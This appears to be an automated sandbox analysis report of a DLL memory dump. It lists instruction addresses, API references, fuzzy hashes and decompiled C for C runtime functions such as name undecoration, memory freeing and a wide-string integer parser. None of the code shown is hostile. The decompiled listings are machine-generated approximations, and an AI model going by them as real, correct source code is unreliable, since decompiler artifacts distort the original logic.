0x6e1a2650
0x6e1a2653
0x6e1a2656
0x6e1a265b
0x6e1a2666
0x6e1a2670
0x6e1a2670
0x6e1a2675
0x6e1a2675
0x6e1a2678
0x6e1a26ab
0x6e1a26b9
0x6e1a26c3
0x00000000
0x6e1a267a
0x6e1a267a
0x6e1a267a
0x6e1a267d
0x6e1a268e
0x6e1a269c
0x6e1a26a6
0x00000000
0x6e1a26a6
0x6e1a267f
0x6e1a267f
0x6e1a2682
0x6e1a26c8
0x6e1a26d6
0x6e1a26db
0x6e1a26db
0x00000000
0x6e1a26db
0x6e1a2684
0x6e1a2684
0x6e1a2687
0x00000000
0x00000000
0x6e1a2689
0x6e1a268c
0x00000000
0x00000000
0x00000000
0x6e1a268c
0x6e1a2678
0x6e1a2616
0x6e1a2619
0x00000000
0x00000000
0x6e1a2623
0x6e1a2628
0x6e1a262d
0x00000000
0x00000000
0x6e1a2634
0x6e1a2571
0x00000000
0x6e1a2571
0x6e1a2537
0x6e1a25f7
0x6e1a25f8
0x00000000
0x6e1a25f8
0x6e1a253f
0x6e1a25e8
0x6e1a25ed
0x00000000
0x6e1a25ed
0x6e1a2548
0x6e1a25dc
0x00000000
0x6e1a25dc
0x6e1a2551
0x6e1a2587
0x6e1a258a
0x6e1a25b0
0x6e1a25b7
0x6e1a25bd
0x6e1a25c5
0x6e1a25d1
0x6e1a258c
0x6e1a258d
0x6e1a2594
0x6e1a259e
0x6e1a25a6
0x6e1a25a6
0x00000000
0x6e1a258a
0x6e1a2556
0x6e1a2580
0x00000000
0x6e1a2580
0x6e1a255b
0x6e1a2578
0x00000000
0x6e1a2578
0x6e1a255d
0x6e1a2563
0x00000000
0x00000000
0x6e1a256b
0x00000000

APIs

DName::operator+.LIBCMT ref: 6E1A25D1
UnDecorator::getSignedDimension.LIBCMT ref: 6E1A25DC
DName::DName.LIBVCRUNTIME ref: 6E1A25ED
UnDecorator::getSignedDimension.LIBCMT ref: 6E1A2692
UnDecorator::getSignedDimension.LIBCMT ref: 6E1A26AF
UnDecorator::getSignedDimension.LIBCMT ref: 6E1A26CC
DName::operator+.LIBCMT ref: 6E1A26E1
UnDecorator::getSignedDimension.LIBCMT ref: 6E1A2704
swprintf.LIBCMT ref: 6E1A2775
DName::operator+.LIBCMT ref: 6E1A27CC

Part of subcall function 6E1A065C: DName::DName.LIBVCRUNTIME ref: 6E1A0680

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
String ID:
API String ID: 3689813335-0
Opcode ID: 38a4b4d4d0f7aa3d9cc05f8595c307e8bafcd640f75dd362849df75038318221
Instruction ID: baa11c3df5594c1161ac961ec94f0d947fc118c98e9be60a50bc02c8606d291f
Opcode Fuzzy Hash: 38a4b4d4d0f7aa3d9cc05f8595c307e8bafcd640f75dd362849df75038318221
Instruction Fuzzy Hash: 1F81A4BAD4420A9EEB00DBEAC859BFE77B9BF15314F214419D71163080EB785AC4FB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B3EDC, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E1B3EDC(void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				intOrPtr _t67;
				void* _t71;

				_t71 = __esi;
				_t36 = _a4;
				_t67 =  *_a4;
				_t75 = _t67 - 0x6e2059d0;
				if(_t67 != 0x6e2059d0) {
					E6E1B110D(_t67);
					_t36 = _a4;
				}
				E6E1B110D( *((intOrPtr*)(_t36 + 0x3c)));
				E6E1B110D( *((intOrPtr*)(_a4 + 0x30)));
				E6E1B110D( *((intOrPtr*)(_a4 + 0x34)));
				E6E1B110D( *((intOrPtr*)(_a4 + 0x38)));
				E6E1B110D( *((intOrPtr*)(_a4 + 0x28)));
				E6E1B110D( *((intOrPtr*)(_a4 + 0x2c)));
				E6E1B110D( *((intOrPtr*)(_a4 + 0x40)));
				E6E1B110D( *((intOrPtr*)(_a4 + 0x44)));
				E6E1B110D( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E6E1B3BF9(_t75);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E6E1B3C64(_t71, _t75);
			}

0x6e1b3edc
0x6e1b3ee1
0x6e1b3ee7
0x6e1b3ee9
0x6e1b3eef
0x6e1b3ef2
0x6e1b3ef7
0x6e1b3efa
0x6e1b3efe
0x6e1b3f09
0x6e1b3f14
0x6e1b3f1f
0x6e1b3f2a
0x6e1b3f35
0x6e1b3f40
0x6e1b3f4b
0x6e1b3f59
0x6e1b3f64
0x6e1b3f6c
0x6e1b3f6d
0x6e1b3f70
0x6e1b3f76
0x6e1b3f7a
0x6e1b3f7e
0x6e1b3f7f
0x6e1b3f89
0x6e1b3f8f
0x6e1b3f90
0x6e1b3f93
0x6e1b3f99
0x6e1b3f9d
0x6e1b3fa1
0x6e1b3fa8

APIs

_free.LIBCMT ref: 6E1B3EF2

Part of subcall function 6E1B110D: HeapFree.KERNEL32(00000000,00000000,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?), ref: 6E1B1123
Part of subcall function 6E1B110D: GetLastError.KERNEL32(?,?,6E1C0F1D,?,00000000,?,A1724430,?,6E1C1221,?,00000007,?,?,6E1BC966,?,?), ref: 6E1B1135

_free.LIBCMT ref: 6E1B3EFE
_free.LIBCMT ref: 6E1B3F09
_free.LIBCMT ref: 6E1B3F14
_free.LIBCMT ref: 6E1B3F1F
_free.LIBCMT ref: 6E1B3F2A
_free.LIBCMT ref: 6E1B3F35
_free.LIBCMT ref: 6E1B3F40
_free.LIBCMT ref: 6E1B3F4B
_free.LIBCMT ref: 6E1B3F59

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 748ea1a154d0311cbe12130fb204b60cd7d0d22193dfb1d07be4630517e2be87
Instruction ID: 4375470b4d27ccea936e4fb3433874e0f2a51bdd934e73fcafdebcaa721678d0
Opcode Fuzzy Hash: 748ea1a154d0311cbe12130fb204b60cd7d0d22193dfb1d07be4630517e2be87
Instruction Fuzzy Hash: A0218376A00108AFCF41DFE4C885DDE7BB9FF08245F0145A6E525DB121EB71EA989F80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B00C7, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E6E1B00C7(intOrPtr _a4, signed int _a8, intOrPtr* _a12, signed int _a16, signed char _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed short* _v172;
				char _v176;
				char _v188;
				signed short* _t176;
				signed int _t177;
				signed int _t178;
				signed short* _t179;
				signed int _t180;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				intOrPtr _t186;
				void* _t187;
				signed char _t189;
				signed int _t193;
				signed int _t194;
				signed int _t196;
				void* _t199;
				intOrPtr _t200;
				signed int _t209;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				signed int _t216;
				intOrPtr _t221;
				void* _t222;
				signed short* _t223;
				signed int _t224;
				signed int _t225;
				intOrPtr _t226;
				void* _t230;
				signed int _t232;
				signed int _t234;
				signed short* _t236;
				signed int _t238;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed short* _t244;
				intOrPtr* _t249;
				signed int _t251;

				if(E6E1AC725( &_a8) == 0) {
					L6:
					_t238 = 0;
					_t209 = 0;
					goto L7;
				} else {
					_t211 = _a16;
					_t240 = 2;
					if(_t211 == 0) {
						L10:
						_t219 =  &_v188;
						E6E1A710E( &_v188, _t230, _a4);
						_v12 = 0;
						_v20 = 0;
						_t176 = _a8;
						_v172 = _t176;
						_t251 =  *_t176 & 0x0000ffff;
						_t177 =  &(_t176[1]);
						L12:
						_a8 = _t177;
						_t178 = E6E1BA3F5(_t219, _t251, 8);
						_pop(_t219);
						__eflags = _t178;
						if(_t178 != 0) {
							_t179 = _a8;
							_t251 =  *_t179 & 0x0000ffff;
							_t177 = _t179 + _t240;
							__eflags = _t177;
							goto L12;
						}
						_t180 = _a20 & 0x000000ff;
						_v8 = _t180;
						__eflags = _t251 - 0x2d;
						if(_t251 != 0x2d) {
							__eflags = _t251 - 0x2b;
							if(_t251 != 0x2b) {
								_t232 = _a8;
								L18:
								_v16 = 0x3a;
								_t221 = 0xff10;
								_v148 = 0x66a;
								_v24 = 0x6f0;
								_v28 = 0x6fa;
								_v32 = 0x966;
								_v36 = 0x970;
								_v40 = 0x9e6;
								_v44 = 0x9f0;
								_v48 = 0xa66;
								_v52 = 0xa70;
								_v56 = 0xae6;
								_v60 = 0xaf0;
								_v64 = 0xb66;
								_v68 = 0xb70;
								_v72 = 0xc66;
								_v76 = 0xc70;
								_v80 = 0xce6;
								_v84 = 0xcf0;
								_v88 = 0xd66;
								_v92 = 0xd70;
								_v96 = 0xe50;
								_v100 = 0xe5a;
								_v104 = 0xed0;
								_v108 = 0xeda;
								_v112 = 0xf20;
								_v116 = 0xf2a;
								_v120 = 0x1040;
								_v124 = 0x104a;
								_v128 = 0x17e0;
								_v132 = 0x17ea;
								_v136 = 0x1810;
								_v140 = 0x181a;
								_v144 = 0xff1a;
								_t241 = 0x30;
								__eflags = _t211;
								if(_t211 == 0) {
									L20:
									__eflags = _t251 - _t241;
									if(_t251 < _t241) {
										L62:
										_t182 = _t251 & 0x0000ffff;
										__eflags = _t182 - 0x41;
										if(_t182 < 0x41) {
											L65:
											_t86 = _t182 - 0x61; // 0x5ff
											_t222 = _t86;
											__eflags = _t222 - 0x19;
											if(_t222 > 0x19) {
												_t183 = _t182 | 0xffffffff;
												__eflags = _t183;
												L70:
												__eflags = _t183;
												if(_t183 == 0) {
													_t184 =  *_t232 & 0x0000ffff;
													_t223 = _t232 + 2;
													_a8 = _t223;
													__eflags = _t184 - 0x78;
													if(_t184 == 0x78) {
														L78:
														__eflags = _t211;
														if(_t211 == 0) {
															_t211 = 0x10;
															_a16 = _t211;
														}
														_t251 =  *_t223 & 0x0000ffff;
														_t224 =  &(_t223[1]);
														__eflags = _t224;
														_a8 = _t224;
														L81:
														asm("cdq");
														_push(_t211);
														_t225 = _t232;
														_v164 = _t211;
														_v160 = _t225;
														_t186 = E6E1CAE20(0xffffffff, 0xffffffff, _t211, _t225);
														_v152 = _t211;
														_v156 = _t225;
														_t213 = _t232;
														_t226 = _t186;
														_v16 = _t213;
														_v168 = _t226;
														while(1) {
															__eflags = _t251 - _t241;
															if(_t251 < _t241) {
																goto L123;
															}
															_t199 = 0x3a;
															__eflags = _t251 - _t199;
															if(_t251 >= _t199) {
																_t200 = 0xff10;
																__eflags = _t251 - 0xff10;
																if(_t251 >= 0xff10) {
																	__eflags = _t251 - _v144;
																	if(_t251 < _v144) {
																		L88:
																		_t243 = (_t251 & 0x0000ffff) - _t200;
																		L122:
																		__eflags = _t243 - 0xffffffff;
																		if(_t243 != 0xffffffff) {
																			L131:
																			__eflags = _t243 - 0xffffffff;
																			if(_t243 == 0xffffffff) {
																				L145:
																				E6E1B0B1E( &_a8, _t251);
																				_t189 = _v8;
																				__eflags = _t189 & 0x00000008;
																				if((_t189 & 0x00000008) != 0) {
																					_t209 = _v20;
																					_t238 = _v12;
																					__eflags = E6E1AF598(_t189, _t238, _t209);
																					if(__eflags == 0) {
																						__eflags = _v8 & 0x00000002;
																						if((_v8 & 0x00000002) != 0) {
																							_t238 =  ~_t238;
																							asm("adc ebx, 0x0");
																							_t209 =  ~_t209;
																						}
																						L156:
																						__eflags = _v176;
																						if(_v176 != 0) {
																							 *(_v188 + 0x350) =  *(_v188 + 0x350) & 0xfffffffd;
																						}
																						L7:
																						_t249 = _a12;
																						if(_t249 != 0) {
																							 *_t249 = _a8;
																						}
																						return _t238;
																					}
																					 *((intOrPtr*)(E6E1B100B(__eflags))) = 0x22;
																					_t193 = _v8;
																					__eflags = _t193 & 0x00000001;
																					if((_t193 & 0x00000001) != 0) {
																						__eflags = _t193 & 0x00000002;
																						if((_t193 & 0x00000002) == 0) {
																							_t194 = _t193 | 0xffffffff;
																							__eflags = _t194;
																							_t209 = 0x7fffffff;
																						} else {
																							_t194 = 0;
																							_t209 = 0x80000000;
																						}
																						L153:
																						_t238 = _t194;
																						goto L156;
																					}
																					_t238 = _t238 | 0xffffffff;
																					_t209 = _t209 | 0xffffffff;
																					goto L156;
																				}
																				_a8 = _v172;
																				_t194 = 0;
																				_t209 = 0;
																				goto L153;
																			}
																			__eflags = _t243 - _a16;
																			if(_t243 >= _a16) {
																				goto L145;
																			}
																			_t196 = _v20;
																			_t234 = _v8 | 0x00000008;
																			__eflags = _t196 - _t213;
																			_v8 = _t234;
																			_t214 = _v12;
																			if(__eflags < 0) {
																				L142:
																				__eflags = 0;
																				L143:
																				_t216 = E6E1CAEC0(_v164, _v160, _t214, _t196) + _t243;
																				__eflags = _t216;
																				_v12 = _t216;
																				asm("adc eax, esi");
																				_v20 = _t234;
																				L144:
																				_t244 = _a8;
																				_t226 = _v168;
																				_t213 = _v16;
																				_t251 =  *_t244 & 0x0000ffff;
																				_a8 =  &(_t244[1]);
																				_t241 = 0x30;
																				continue;
																			}
																			if(__eflags > 0) {
																				L136:
																				__eflags = _t214 - _t226;
																				if(_t214 != _t226) {
																					L141:
																					_v8 = _t234 | 0x00000004;
																					goto L144;
																				}
																				__eflags = _t196 - _v16;
																				if(_t196 != _v16) {
																					goto L141;
																				}
																				__eflags = 0 - _v152;
																				if(__eflags < 0) {
																					goto L143;
																				}
																				if(__eflags > 0) {
																					goto L141;
																				}
																				__eflags = _t243 - _v156;
																				if(_t243 <= _v156) {
																					goto L143;
																				}
																				goto L141;
																			}
																			__eflags = _t214 - _t226;
																			if(_t214 < _t226) {
																				goto L142;
																			}
																			goto L136;
																		}
																		goto L123;
																	}
																	_t243 = _t241 | 0xffffffff;
																	__eflags = _t243;
																	goto L122;
																}
																_t200 = 0x660;
																__eflags = _t251 - 0x660;
																if(_t251 < 0x660) {
																	goto L123;
																}
																__eflags = _t251 - _v148;
																if(_t251 >= _v148) {
																	_t200 = _v24;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v28;
																	if(_t251 < _v28) {
																		goto L88;
																	}
																	_t200 = _v32;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v36;
																	if(_t251 < _v36) {
																		goto L88;
																	}
																	_t200 = _v40;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v44;
																	if(_t251 < _v44) {
																		goto L88;
																	}
																	_t200 = _v48;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v52;
																	if(_t251 < _v52) {
																		goto L88;
																	}
																	_t200 = _v56;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v60;
																	if(_t251 < _v60) {
																		goto L88;
																	}
																	_t200 = _v64;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v68;
																	if(_t251 < _v68) {
																		goto L88;
																	}
																	_t200 = _v72;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v76;
																	if(_t251 < _v76) {
																		goto L88;
																	}
																	_t200 = _v80;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v84;
																	if(_t251 < _v84) {
																		goto L88;
																	}
																	_t200 = _v88;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v92;
																	if(_t251 < _v92) {
																		goto L88;
																	}
																	_t200 = _v96;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v100;
																	if(_t251 < _v100) {
																		goto L88;
																	}
																	_t200 = _v104;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v108;
																	if(_t251 < _v108) {
																		goto L88;
																	}
																	_t200 = _v112;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v116;
																	if(_t251 < _v116) {
																		goto L88;
																	}
																	_t200 = _v120;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v124;
																	if(_t251 < _v124) {
																		goto L88;
																	}
																	_t200 = _v128;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v132;
																	if(_t251 < _v132) {
																		goto L88;
																	}
																	_t200 = _v136;
																	__eflags = _t251 - _t200;
																	if(_t251 < _t200) {
																		goto L123;
																	}
																	__eflags = _t251 - _v140;
																	if(_t251 >= _v140) {
																		goto L123;
																	}
																}
																goto L88;
															}
															_t243 = (_t251 & 0x0000ffff) - 0x30;
															goto L122;
															L123:
															_t242 = _t251 & 0x0000ffff;
															__eflags = _t242 - 0x41;
															if(_t242 < 0x41) {
																L126:
																_t133 = _t242 - 0x61; // -49
																_t187 = _t133;
																__eflags = _t187 - 0x19;
																if(_t187 > 0x19) {
																	_t243 = _t242 | 0xffffffff;
																	__eflags = _t243;
																	goto L131;
																}
																L127:
																__eflags = _t187 - 0x19;
																if(_t187 <= 0x19) {
																	_t242 = _t242 + 0xffffffe0;
																	__eflags = _t242;
																}
																_t243 = _t242 + 0xffffffc9;
																goto L131;
															}
															__eflags = _t242 - 0x5a;
															if(_t242 > 0x5a) {
																goto L126;
															}
															_t132 = _t242 - 0x61; // -49
															_t187 = _t132;
															goto L127;
														}
													}
													__eflags = _t184 - 0x58;
													if(_t184 == 0x58) {
														goto L78;
													}
													__eflags = _t211;
													if(_t211 == 0) {
														_t211 = 8;
														_a16 = _t211;
													}
													E6E1B0B1E( &_a8, _t184);
													goto L81;
												}
												__eflags = _t211;
												if(_t211 == 0) {
													_t211 = 0xa;
													_a16 = _t211;
												}
												goto L81;
											}
											L66:
											__eflags = _t222 - 0x19;
											if(_t222 <= 0x19) {
												_t182 = _t182 + 0xffffffe0;
												__eflags = _t182;
											}
											_t183 = _t182 + 0xffffffc9;
											goto L70;
										}
										__eflags = _t182 - 0x5a;
										if(_t182 > 0x5a) {
											goto L65;
										}
										_t85 = _t182 - 0x61; // 0x5ff
										_t222 = _t85;
										goto L66;
									}
									__eflags = _t251 - _v16;
									if(_t251 >= _v16) {
										__eflags = _t251 - _t221;
										if(_t251 >= _t221) {
											__eflags = _t251 - _v144;
											if(_t251 < _v144) {
												L29:
												_t183 = (_t251 & 0x0000ffff) - _t221;
												L61:
												__eflags = _t183 - 0xffffffff;
												if(_t183 != 0xffffffff) {
													goto L70;
												}
												goto L62;
											}
											_t183 = 0xffffffffffffffff;
											__eflags = 0xffffffffffffffff;
											goto L61;
										}
										__eflags = _t251 - 0x660;
										if(_t251 < 0x660) {
											goto L62;
										}
										__eflags = _t251 - _v148;
										if(_t251 >= _v148) {
											_t221 = _v24;
											__eflags = _t251 - _t221;
											if(_t251 < _t221) {
												goto L62;
											}
											__eflags = _t251 - _v28;
											if(_t251 >= _v28) {
												_t221 = _v32;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v36;
												if(_t251 < _v36) {
													goto L29;
												}
												_t221 = _v40;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v44;
												if(_t251 < _v44) {
													goto L29;
												}
												_t221 = _v48;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v52;
												if(_t251 < _v52) {
													goto L29;
												}
												_t221 = _v56;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v60;
												if(_t251 < _v60) {
													goto L29;
												}
												_t221 = _v64;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v68;
												if(_t251 < _v68) {
													goto L29;
												}
												_t221 = _v72;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v76;
												if(_t251 < _v76) {
													goto L29;
												}
												_t221 = _v80;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v84;
												if(_t251 < _v84) {
													goto L29;
												}
												_t221 = _v88;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v92;
												if(_t251 < _v92) {
													goto L29;
												}
												_t221 = _v96;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v100;
												if(_t251 < _v100) {
													goto L29;
												}
												_t221 = _v104;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v108;
												if(_t251 < _v108) {
													goto L29;
												}
												_t221 = _v112;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v116;
												if(_t251 < _v116) {
													goto L29;
												}
												_t221 = _v120;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v124;
												if(_t251 < _v124) {
													goto L29;
												}
												_t221 = _v128;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v132;
												if(_t251 < _v132) {
													goto L29;
												}
												_t221 = _v136;
												__eflags = _t251 - _t221;
												if(_t251 < _t221) {
													goto L62;
												}
												__eflags = _t251 - _v140;
												if(_t251 >= _v140) {
													goto L62;
												}
											}
											goto L29;
										}
										_t183 = (_t251 & 0x0000ffff) - 0x660;
										goto L61;
									}
									_t183 = (_t251 & 0x0000ffff) - _t241;
									goto L61;
								}
								__eflags = _t211 - 0x10;
								if(_t211 != 0x10) {
									goto L81;
								}
								goto L20;
							}
							L16:
							_t236 = _a8;
							_t251 =  *_t236 & 0x0000ffff;
							_t232 = _t236 + _t240;
							_a8 = _t232;
							goto L18;
						}
						_v8 = _t180 | _t240;
						goto L16;
					}
					if(_t211 < _t240) {
						L5:
						 *((intOrPtr*)(E6E1B100B(_t264))) = 0x16;
						E6E1AD950();
						goto L6;
					}
					_t264 = _t211 - 0x24;
					if(_t211 <= 0x24) {
						goto L10;
					}
					goto L5;
				}
			}

0x6e1b00df
0x6e1b0104
0x6e1b0106
0x6e1b0108
0x00000000
0x6e1b00e1
0x6e1b00e1
0x6e1b00e6
0x6e1b00e9
0x6e1b011f
0x6e1b0122
0x6e1b0128
0x6e1b012f
0x6e1b0132
0x6e1b0135
0x6e1b0138
0x6e1b013e
0x6e1b0141
0x6e1b014e
0x6e1b0151
0x6e1b0154
0x6e1b015a
0x6e1b015b
0x6e1b015d
0x6e1b0146
0x6e1b0149
0x6e1b014c
0x6e1b014c
0x00000000
0x6e1b014c
0x6e1b015f
0x6e1b0163
0x6e1b0166
0x6e1b016a
0x6e1b0173
0x6e1b0177
0x6e1b0186
0x6e1b0189
0x6e1b0189
0x6e1b0190
0x6e1b0195
0x6e1b01a4
0x6e1b01ab
0x6e1b01b2
0x6e1b01b9
0x6e1b01c0
0x6e1b01c7
0x6e1b01ce
0x6e1b01d5
0x6e1b01dc
0x6e1b01e3
0x6e1b01ea
0x6e1b01f1
0x6e1b01f8
0x6e1b01ff
0x6e1b0206
0x6e1b020d
0x6e1b0214
0x6e1b021b
0x6e1b0222
0x6e1b0229
0x6e1b0230
0x6e1b0237
0x6e1b023e
0x6e1b0245
0x6e1b024c
0x6e1b0253
0x6e1b025a
0x6e1b0261
0x6e1b0268
0x6e1b0272
0x6e1b027c
0x6e1b0288
0x6e1b0289
0x6e1b028b
0x6e1b0296
0x6e1b0296
0x6e1b0299
0x6e1b0417
0x6e1b0417
0x6e1b041a
0x6e1b041d
0x6e1b0429
0x6e1b0429
0x6e1b0429
0x6e1b042c
0x6e1b042f
0x6e1b043e
0x6e1b043e
0x6e1b0441
0x6e1b0441
0x6e1b0443
0x6e1b0451
0x6e1b0454
0x6e1b0457
0x6e1b045a
0x6e1b045d
0x6e1b0479
0x6e1b0479
0x6e1b047b
0x6e1b047f
0x6e1b0480
0x6e1b0480
0x6e1b0483
0x6e1b0486
0x6e1b0486
0x6e1b0489
0x6e1b048c
0x6e1b048e
0x6e1b048f
0x6e1b0490
0x6e1b0492
0x6e1b049e
0x6e1b04a4
0x6e1b04a9
0x6e1b04b1
0x6e1b04b7
0x6e1b04b9
0x6e1b04bb
0x6e1b04be
0x6e1b04c4
0x6e1b04c4
0x6e1b04c7
0x00000000
0x00000000
0x6e1b04cf
0x6e1b04d0
0x6e1b04d3
0x6e1b04e0
0x6e1b04e5
0x6e1b04e8
0x6e1b0634
0x6e1b063b
0x6e1b0505
0x6e1b0508
0x6e1b0644
0x6e1b0644
0x6e1b0647
0x6e1b0673
0x6e1b0673
0x6e1b0676
0x6e1b0705
0x6e1b0709
0x6e1b070e
0x6e1b0711
0x6e1b0713
0x6e1b0724
0x6e1b0727
0x6e1b0735
0x6e1b0737
0x6e1b076c
0x6e1b0770
0x6e1b0772
0x6e1b0774
0x6e1b0777
0x6e1b0777
0x6e1b0779
0x6e1b0779
0x6e1b0780
0x6e1b078c
0x6e1b078c
0x6e1b010a
0x6e1b010a
0x6e1b010f
0x6e1b0114
0x6e1b0114
0x6e1b011e
0x6e1b011e
0x6e1b073e
0x6e1b0744
0x6e1b0747
0x6e1b0749
0x6e1b0753
0x6e1b0755
0x6e1b0760
0x6e1b0760
0x6e1b0763
0x6e1b0757
0x6e1b0757
0x6e1b0759
0x6e1b0759
0x6e1b0768
0x6e1b0768
0x00000000
0x6e1b0768
0x6e1b074b
0x6e1b074e
0x00000000
0x6e1b074e
0x6e1b071b
0x6e1b071e
0x6e1b0720
0x00000000
0x6e1b0720
0x6e1b067c
0x6e1b067f
0x00000000
0x00000000
0x6e1b0688
0x6e1b068b
0x6e1b068e
0x6e1b0690
0x6e1b0693
0x6e1b0696
0x6e1b06c5
0x6e1b06c5
0x6e1b06c7
0x6e1b06de
0x6e1b06de
0x6e1b06e0
0x6e1b06e3
0x6e1b06e5
0x6e1b06e8
0x6e1b06e8
0x6e1b06eb
0x6e1b06f1
0x6e1b06f6
0x6e1b06fc
0x6e1b06ff
0x00000000
0x6e1b06ff
0x6e1b0698
0x6e1b069e
0x6e1b069e
0x6e1b06a0
0x6e1b06bd
0x6e1b06c0
0x00000000
0x6e1b06c0
0x6e1b06a2
0x6e1b06a5
0x00000000
0x00000000
0x6e1b06ab
0x6e1b06b1
0x00000000
0x00000000
0x6e1b06b3
0x00000000
0x00000000
0x6e1b06b5
0x6e1b06bb
0x00000000
0x00000000
0x00000000
0x6e1b06bb
0x6e1b069a
0x6e1b069c
0x00000000
0x00000000
0x00000000
0x6e1b069c
0x00000000
0x6e1b0647
0x6e1b0641
0x6e1b0641
0x00000000
0x6e1b0641
0x6e1b04ee
0x6e1b04f3
0x6e1b04f6
0x00000000
0x00000000
0x6e1b04fc
0x6e1b0503
0x6e1b050f
0x6e1b0512
0x6e1b0515
0x00000000
0x00000000
0x6e1b051b
0x6e1b051f
0x00000000
0x00000000
0x6e1b0521
0x6e1b0524
0x6e1b0527
0x00000000
0x00000000
0x6e1b052d
0x6e1b0531
0x00000000
0x00000000
0x6e1b0533
0x6e1b0536
0x6e1b0539
0x00000000
0x00000000
0x6e1b053f
0x6e1b0543
0x00000000
0x00000000
